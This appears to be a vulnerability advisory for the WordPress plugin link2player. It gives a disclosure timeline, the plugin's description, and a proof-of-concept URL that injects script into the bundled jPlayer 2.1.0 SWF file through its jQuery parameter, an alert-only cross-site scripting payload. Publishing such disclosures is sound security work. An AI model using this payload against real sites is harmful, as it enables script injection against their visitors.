wp-plugin : link2player

Plugin Details
Plugin Name: wp-plugin : link2player
Effected Version : (and most probably lower version's if any)
Vulnerability : Components with Known Vulnerabilities
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/link2player/asset/lib/jquery.jplayer.2.1.0/jplayer.swf?jQuery=%29}catch%28e%29{}if%28!self.a%29self.a=!alert%28/1337day%20TUNISIAN%20CYBER/%29//


Disclosure Timeline
Vendor Contacted : 2013-12-26
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number :
Plugin Description :
[| = Features = <a href="http://example.com/path/to/audio-or-video.mp4">Example audio or video</a> If you write a link like above, Link2Player replaces it with jPlayer. = Supported audio = .m4a .mp3 .ogg .oga .fla .wav .webma = Supported video = .m4v .mp4 .flv .ogv .webmv .webm Playable or not belongs to browser accessing your blog. mp3, m4a, m4v, mp4 may be playable in most browsers. = How it works = 1. Load javascript and css in the Plugin part(php) 2. Select link for audio/viode(jQuery) 3. Replace links with jPlayer(jQuery) Selecting links by extension like $('a[href$=mp3]'). If there is a query string( ?foo=bar ) or extension not supported, Link2Player does not work. Most are written in JavaScript. If your theme loads old jQuery in it's own accord, Link2Player may not work. I have not tried with any old jQuery. = Notes = * jQuery: included in the Wordpress. * jPlayer: 2.1.0 included in Link2Player plugin. * Blue Monday skin: included in Link2Player plugin. * Player design is not customizable. ]